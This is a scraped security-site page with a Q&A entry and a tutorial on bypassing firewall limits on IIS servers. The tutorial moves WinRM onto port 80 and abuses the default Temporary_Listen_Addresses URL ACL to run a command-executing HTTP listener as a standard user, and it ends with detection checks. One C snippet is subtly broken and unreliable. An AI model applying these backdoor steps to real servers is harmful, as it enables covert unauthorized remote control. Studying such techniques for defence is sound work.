[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fUjBfIHN8h117JzwgZyB7zTTiLwkCtBWQib5hKSJRmio":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},1123,"What are the detection methods for identifying WinRM service running on non-standard ports like 80 or 443?","Detection involves checking for anomalies in IIS logs and network traffic. Since the WinRM service uses HTTP.sys, requests to port 80 that are not handled by IIS will still generate entries in the HTTP.sys log. Administrators can monitor for unusual URL patterns (e.g., `\u002Fwsman` paths) or sudden increases in HTTP traffic on normally passive endpoints. Additionally, reviewing URL ACLs with `netsh http show urlacl` may reveal unauthorized reservations. For more on detection and related techniques, see [Testing and Analysis of Bypassing AppLocker Using LUA Scripts](\u002Fnews\u002Ftesting-and-analysis-of-bypassing-applocker-using-lua-scripts).","\u003Cp>Detection involves checking for anomalies in IIS logs and network traffic. Since the WinRM service uses HTTP.sys, requests to port 80 that are not handled by IIS will still generate entries in the HTTP.sys log. Administrators can monitor for unusual URL patterns (e.g., `\u002Fwsman` paths) or sudden increases in HTTP traffic on normally passive endpoints. Additionally, reviewing URL ACLs with `netsh http show urlacl` may reveal unauthorized reservations. For more on detection and related techniques, see [Testing and Analysis of Bypassing AppLocker Using LUA Scripts](\u002Fnews\u002Ftesting-and-analysis-of-bypassing-applocker-using-lua-scripts).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fbypassing-firewall-using-iis-port-sharing-feature\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-detection-methods-for-identifying-winrm-service-running-on-non-stan-1777480419915","detection methods, WinRM, IIS logs, URL ACL, HTTP.sys monitoring",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},273,"Bypassing firewall using IIS port sharing feature","bypassing-firewall-using-iis-port-sharing-feature","Learn how to bypass firewall restrictions using IIS port sharing and WinRM for remote server management on ports 80\u002F443, including methods for high and low privileges.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>I've been pondering this question recently:\u003C\u002Fp>\u003Cp>A Windows server has IIS service enabled, and the firewall only allows communication through port 80 or 443. How can we achieve remote management of this server without using webshell? Furthermore, if we only have low privileges, is there a way?\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>HTTP.sys and port sharing\u003C\u002Fli>\u003Cli>WinRM service\u003C\u002Fli>\u003Cli>HTTP Server API\u003C\u002Fli>\u003Cli>Exploitation methods targeting ports 80 and 443\u003C\u002Fli>\u003Cli>Exploitation methods for high and low privileges\u003C\u002Fli>\u003Cli>Detection methods\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. HTTP.sys and Port Sharing\u003C\u002Fh3>\u003Cp>Microsoft introduced the kernel-mode driver (Http.sys) in Windows 2003 Server to listen for HTTP traffic and process it based on URLs, allowing any user process to share TCP ports dedicated to HTTP traffic.\u003C\u002Fp>\u003Cp>In other words, through HTTP.sys, multiple processes will be able to listen for HTTP traffic on the same port.\u003C\u002Fp>\u003Cp>The Netsh command can be used to query and configure HTTP.sys settings and parameters. Reference materials are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fhttp\u002Fnetsh-commands-for-http\u003C\u002Fp>\u003Cp>To list all URL DACLs, use the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh http show urlacl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The system includes 10 DACLs by default, two of which correspond to the WinRM service. Specific information is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>    Reserved URL            : http:\u002F\u002F+:5985\u002Fwsman\u002F\u003Cbr>        User: NT SERVICE\\WinRM\u003Cbr>            Listen: Yes\u003Cbr>            Delegate: No\u003Cbr>        User: NT SERVICE\\Wecsvc\u003Cbr>            Listen: Yes\u003Cbr>            Delegate: No\u003Cbr>            SDDL: D:(A;;GX;;;S-1-5-80-569256582-2953403351-2909559716-1301513147\u003Cbr>-412116970)(A;;GX;;;S-1-5-80-4059739203-877974739-1245631912-527174227-299656351\u003Cbr>7)\u003Cbr>\u003Cbr>    Reserved URL            : https:\u002F\u002F+:5986\u002Fwsman\u002F\u003Cbr>        User: NT SERVICE\\WinRM\u003Cbr>            Listen: Yes\u003Cbr>            Delegate: No\u003Cbr>        User: NT SERVICE\\Wecsvc\u003Cbr>            Listen: Yes\u003Cbr>            Delegate: No\u003Cbr>            SDDL: D:(A;;GX;;;S-1-5-80-569256582-2953403351-2909559716-1301513147\u003Cbr>-412116970)(A;;GX;;;S-1-5-80-4059739203-877974739-1245631912-527174227-299656351\u003Cbr>7)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Port 5985 corresponds to HTTP, port 5986 corresponds to HTTPS\u003C\u002Fp>\u003Ch3>2. WinRM Service\u003C\u002Fh3>\u003Cp>Learning Materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fwinrm\u002Fportal\u003C\u002Fp>\u003Cp>Full name: Windows Remote Management, capable of executing commands on remote hosts\u003C\u002Fp>\u003Ch3>3. HTTP Server API\u003C\u002Fh3>\u003Cp>Learning Materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fhttp\u002Fhttp-api-start-page\u003C\u002Fp>\u003Cp>HTTP Server API enables applications to receive HTTP requests directed to URLs and send HTTP responses\u003C\u002Fp>\u003Ch2>0x03 Utilizing WinRM Service for Port Reuse\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Twi1ight's article has already covered this content. Thanks for his sharing. The address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fpaper.seebug.org\u002F1004\u002F\u003C\u002Fp>\u003Cp>This section only summarizes and organizes the content from that article with slight additions\u003C\u002Fp>\u003Cp>Windows Server 2008 has WinRM service disabled by default, Windows Server 2012 has it enabled by default\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The following operations require administrator privileges.\u003C\u002Fp>\u003Ch3>1. If the WinRM service is already enabled on the system\u003C\u002Fh3>\u003Ch4>(1) Check the listener configuration\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm e winrm\u002Fconfig\u002Flistener\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>By default, it listens on port 5985. To avoid modifying the default configuration, we need to add port 80 here.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command to view WinRM configuration is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm get winrm\u002Fconfig\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Add port 80\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm set winrm\u002Fconfig\u002Fservice @{EnableCompatibilityHttpListener=\"true\"}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Additional note:\u003C\u002Fp>\u003Cp>The command to remove port 80 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm set winrm\u002Fconfig\u002Fservice @{EnableCompatibilityHttpListener=\"false\"}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If port 80 is not added, remote connections must specify port 5985, as shown in the following example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrs -r:http:\u002F\u002F192.168.112.129:5985 -u:test -p:1234 \"whoami\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Allow all accounts in the Administrators group to access the service\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System \u002Fv LocalAccountTokenFilterPolicy \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If this setting is not configured, only the built-in Administrator account can be used for remote connections.\u003C\u002Fp>\u003Ch3>2. If the WinRM service is not enabled on the system\u003C\u002Fh3>\u003Ch4>(1) Enable and configure the service using default settings\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Winrm quickconfig -q\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This will automatically perform the following actions:\u003C\u002Fp>\u003Cul>\u003Cli>Start the WinRM service and set its startup type to automatic\u003C\u002Fli>\u003Cli>Add listener configuration\u003C\u002Fli>\u003Cli>Add firewall rules\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>(2) Modify the default port\u003C\u002Fh4>\u003Cp>After enabling the service, it listens on port 5985 by default. For better concealment, change the default port from 5985 to port 80.\u003C\u002Fp>\u003Cp>Change the default HTTP port to 80:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm set winrm\u002Fconfig\u002FListener?Address=*+Transport=HTTP @{Port=\"80\"}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command to restore the default HTTP port to 5985 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm set winrm\u002Fconfig\u002FListener?Address=*+Transport=HTTP @{Port=\"5985\"}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Allow all accounts in the Administrators group to access the service\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System \u002Fv LocalAccountTokenFilterPolicy \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If this is not set, only the built-in administrator account Administrator can be used for remote connections\u003C\u002Fp>\u003Ch3>3. Connect to the remote host via the WinRM service\u003C\u002Fh3>\u003Cp>The local system needs to use the same language environment as the remote host\u003C\u002Fp>\u003Ch4>(1) Enable the WinRM service on the local system\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Winrm quickconfig -q\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Set access rules on the local system to allow connections to all hosts\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm set winrm\u002Fconfig\u002FClient @{TrustedHosts=\"*\"}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command to delete this access rule is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm set winrm\u002Fconfig\u002FClient @{TrustedHosts=\"\"}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Example command for connecting to a remote host\u003C\u002Fh4>\u003Cp>If using the default port 5985, the command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrs -r:http:\u002F\u002F192.168.112.129:5985 -u:administrator -p:1234 \"whoami\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If using port 80, the command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrs -r:http:\u002F\u002F192.168.112.129 -u:administrator -p:1234 \"whoami\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Port Reuse via HTTP Server API\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Sample Code Testing\u003C\u002Fh3>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fhttp\u002Fhttp-server-sample-application\u003C\u002Fp>\u003Cp>The code supports registering multiple URLs simultaneously, processing requests, and sending HTTP responses.\u003C\u002Fp>\u003Cp>Simple test as follows:\u003C\u002Fp>\u003Cp>Server IP is 192.168.112.129\u003C\u002Fp>\u003Cp>Execute with administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>http-server-sample-application.exe http:\u002F\u002F+:80\u002FMyUri1 http:\u002F\u002F+:80\u002FMyUri2\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Open browser and visit http:\u002F\u002F192.168.112.129:80\u002FMyUri1 and http:\u002F\u002F192.168.112.129:80\u002FMyUri2 respectively\u003C\u002Fp>\u003Cp>The received results are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016711387_0_34b90b3715.jpeg\">\u003C\u002Fp>\u003Cp>The sample code registers the URL as Listen On via API HttpAddUrl(). Under default configuration, administrator privileges are required for successful addition; otherwise error occurs: HttpAddUrl failed with 5, indicating insufficient permissions\u003C\u002Fp>\u003Cp>However, normal operation under standard user privileges can be achieved by adding url acl (requires administrator privileges)\u003C\u002Fp>\u003Ch3>2. Enable sample code to run with standard user privileges by adding url acl (requires administrator privileges)\u003C\u002Fh3>\u003Cp>Method as follows:\u003C\u002Fp>\u003Cp>Add url acl, granting Everyone user permissions for specified URL, command as follows (administrator privileges):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh http add urlacl url=http:\u002F\u002F+:80\u002FMyUri user=everyone\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Command to delete this url acl is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh http delete urlacl url=http:\u002F\u002F+:80\u002FMyUri\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute the test program again (with standard user privileges), command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>http-server-sample-application.exe http:\u002F\u002F+:80\u002FMyUri\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execution successful\u003C\u002Fp>\u003Ch3>3. Utilize existing URL ACLs to run the sample code with standard user privileges\u003C\u002Fh3>\u003Cp>List all URL DACLs, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh http show urlacl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Note that under default configuration, the following ACL is included:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp> Reserved URL            : http:\u002F\u002F+:80\u002FTemporary_Listen_Addresses\u002F\u003Cbr>       User: \\Everyone\u003Cbr>           Listen: Yes\u003Cbr>           Delegate: No\u003Cbr>           SDDL: D:(A;;GX;;;WD)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>User is Everyone, so we can leverage this URL\u003C\u002Fp>\u003Cp>Execute the sample program (with standard user privileges), command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>http-server-sample-application.exe http:\u002F\u002F+:80\u002FTemporary_Listen_Addresses\u002FMyUri\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execution successful\u003C\u002Fp>\u003Ch3>4. Modify the example code to implement command execution\u003C\u002Fh3>\u003Cp>Approach is as follows:\u003C\u002Fp>\u003Cp>Send the cmd command to be executed via a GET request, in the format ?\u003Ccommand>\u003C\u002Fcommand>\u003C\u002Fp>\u003Cp>For example: http:\u002F\u002F192.168.112.129\u002FMyUri?whoami, the command to be executed is whoami, reply with the execution result in the Response\u003C\u002Fp>\u003Cp>For GET and POST requests that do not conform to the format, reply with 404 in the Response\u003C\u002Fp>\u003Cp>Implementation code:\u003C\u002Fp>\u003Cp>Using the example program as a template, the following locations need to be modified:\u003C\u002Fp>\u003Ch4>(1) Use ? to pass parameters\u003C\u002Fh4>\u003Cp>pRequest-&gt;CookedUrl.pQueryString can read parameters, but includes the useless character ?, the first character of pRequest-&gt;CookedUrl.pQueryString needs to be removed when actually executing the command\u003C\u002Fp>\u003Cp>C code to remove the first character of pRequest-&gt;CookedUrl.pQueryString:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>WCHAR *QueryString = new WCHAR[pRequest-&gt;CookedUrl.QueryStringLength-1];\u003Cbr>wcsncpy_s(QueryString, wcslen(QueryString), pRequest-&gt;CookedUrl.pQueryString + 1, wcslen(QueryString) - 1);\u003Cbr>wprintf_s(L\"%s\\n\", QueryString);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Replacement of special characters\u003C\u002Fh4>\u003Cul>\u003Cli>Spaces are encoded as %20\u003C\u002Fli>\u003Cli>\" is encoded as %22\u003C\u002Fli>\u003Cli>' is encoded as %27\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For example, the browser input string 'whoami \u002Fall' will be encoded as 'whoami%20\u002Fall', and this command cannot be directly executed in the command line\u003C\u002Fp>\u003Cp>The C code for restoring URL encoding has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code supports multi-byte character sets and Unicode character sets\u003C\u002Fp>\u003Ch4>(3) Use pipes to read commands and execute them, then return the results\u003C\u002Fh4>\u003Cp>The code for executing cmd commands using pipes and obtaining results has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch4>(4) Modify the format of the returned results\u003C\u002Fh4>\u003Cp>The returned results need to be formatted, converting the \\n newline character to \u003Cbr> in HTML; otherwise, the content displayed in the browser will not wrap\u003C\u002Fp>\u003Cp>The code for converting newline characters (\\n) in text to HTML line breaks (\u003Cbr>) has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The final implemented code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Only URLs of a specific format can execute commands, otherwise a 404 error is displayed\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016716192_1_e174b4365e.jpeg\">\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>http:\u002F\u002F192.168.112.129\u002FMyUri?net%20start\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016721649_2_af6c64a71a.jpeg\">\u003C\u002Fp>\u003Cp>HTTPS protocol is also supported, command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>https:\u002F\u002F192.168.112.129\u002FMyUri?net%20start\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016728050_3_b792bcf698.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Exploitation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The Windows server has the IIS service enabled, and the firewall only allows communication on ports 80 or 443. The method to achieve remote management of this server without using a webshell is as follows:\u003C\u002Fp>\u003Ch3>1. Using Administrator Privileges\u003C\u002Fh3>\u003Ch4>(1) Using WinRM Service\u003C\u002Fh4>\u003Cp>Requires enabling WinRM service\u003C\u002Fp>\u003Cp>Requires password or hash of an account in the Administrators group\u003C\u002Fp>\u003Ch4>(2) Using HTTP Server API\u003C\u002Fh4>\u003Cp>Can use any URL\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Both port 80 and 443 are available\u003C\u002Fp>\u003Ch3>2. Using Standard User Privileges\u003C\u002Fh3>\u003Ch4>(1) Using HTTP Server API\u003C\u002Fh4>\u003Cp>Using existing URL ACL: http:\u002F\u002F+:80\u002FTemporary_Listen_Addresses\u002F\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Cannot use port 443\u003C\u002Fp>\u003Ch2>0x06 Detection Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Detect whether the port sharing feature of the current IIS server is being abused using the following methods\u003C\u002Fp>\u003Ch3>1. Detect the URLs in use\u003C\u002Fh3>\u003Cp>If the HTTP Server API is used, the program will register URLs during runtime. View the command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh http sh ser\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Suspicious result example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Server session ID: D000000020000174\u003Cbr>    Version: 1.0\u003Cbr>    State: Active\u003Cbr>    Properties:\u003Cbr>        Max bandwidth: 4294967295\u003Cbr>        Timeouts:\u003Cbr>            Entity body timeout (secs): 120\u003Cbr>            Drain entity body timeout (secs): 120\u003Cbr>            Request queue timeout (secs): 120\u003Cbr>            Idle connection timeout (secs): 120\u003Cbr>            Header wait timeout (secs): 120\u003Cbr>            Minimum send rate (bytes\u002Fsec): 150\u003Cbr>    URL groups:\u003Cbr>    URL group ID: AC0000004000017C\u003Cbr>        State: Active\u003Cbr>        Request queue name: Request queue is unnamed.\u003Cbr>        Properties:\u003Cbr>            Max bandwidth: inherited\u003Cbr>            Max connections: inherited\u003Cbr>            Timeouts:\u003Cbr>                Timeout values inherited\u003Cbr>            Number of registered URLs: 1\u003Cbr>            Registered URLs:\u003Cbr>                HTTP:\u002F\u002F192.168.112.129:80:192.168.112.129\u002FMYURI\u002F\u003Cbr>\u003Cbr>    Server session ID: D000000020000173\u003Cbr>    Version: 1.0\u003Cbr>    State: Active\u003Cbr>    Properties:\u003Cbr>        Max bandwidth: 4294967295\u003Cbr>        Timeouts:\u003Cbr>            Entity body timeout (secs): 120\u003Cbr>            Drain entity body timeout (secs): 120\u003Cbr>            Request queue timeout (secs): 120\u003Cbr>            Idle connection timeout (secs): 120\u003Cbr>            Header wait timeout (secs): 120\u003Cbr>            Minimum send rate (bytes\u002Fsec): 150\u003Cbr>    URL groups:\u003Cbr>    URL group ID: AC0000004000017B\u003Cbr>        State: Active\u003Cbr>        Request queue name: Request queue is unnamed.\u003Cbr>        Properties:\u003Cbr>            Max bandwidth: inherited\u003Cbr>            Max connections: inherited\u003Cbr>            Timeouts:\u003Cbr>                Timeout values inherited\u003Cbr>            Number of registered URLs: 1\u003Cbr>            Registered URLs:\u003Cbr>                HTTPS:\u002F\u002F192.168.112.129:443:192.168.112.129\u002FMYURI\u002F\u003Cbr>                \u003Cbr>Server session ID: D600000020000077\u003Cbr>    Version: 1.0\u003Cbr>    State: Active\u003Cbr>    Properties:\u003Cbr>        Max bandwidth: 4294967295\u003Cbr>        Timeouts:\u003Cbr>            Entity body timeout (secs): 120\u003Cbr>            Drain entity body timeout (secs): 120\u003Cbr>            Request queue timeout (secs): 120\u003Cbr>            Idle connection timeout (secs): 120\u003Cbr>            Header wait timeout (secs): 120\u003Cbr>            Minimum send rate (bytes\u002Fsec): 150\u003Cbr>    URL groups:\u003Cbr>    URL group ID: BF00000040000120\u003Cbr>        State: Active\u003Cbr>        Request queue name: Request queue is unnamed.\u003Cbr>        Properties:\u003Cbr>            Max bandwidth: inherited\u003Cbr>            Max connections: inherited\u003Cbr>            Timeouts:\u003Cbr>                Timeout values inherited\u003Cbr>            Number of registered URLs: 1\u003Cbr>            Registered URLs:\u003Cbr>                HTTP:\u002F\u002F+:80\u002FTEMPORARY_LISTEN_ADDRESSES\u002F\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Check WinRM Service Configuration\u003C\u002Fh3>\u003Cp>If an attacker obtains administrator privileges, the WinRM service configuration could be abused\u003C\u002Fp>\u003Cp>Check listener configuration:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>winrm e winrm\u002Fconfig\u002Flistener\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Check if suspicious ports are open\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article addresses the following issue:\u003C\u002Fp>\u003Cp>A Windows server has IIS service enabled, and the firewall only allows communication on ports 80 or 443. How can remote management of this server be achieved without using webshells and with only regular user permissions?\u003C\u002Fp>\u003Cp>Solution:\u003C\u002Fp>\u003Cp>Use code:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Use existing URL ACLs with the following command parameters:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HTTPServerWebshell.exe http:\u002F\u002F+:80\u002FTemporary_Listen_Addresses\u002F\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>I've been pondering this question recently:\u003C\u002Fp>\u003Cp>A Windows server has IIS service enabled, and the firewall only allows communication through port 80 or 443. How can we achieve remote management of this server without using webshell? Furthermore, if we only have low privileges, is there a way?\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>HTTP.sys and port sharing\u003C\u002Fli>\u003Cli>WinRM service\u003C\u002Fli>\u003Cli>HTTP Server 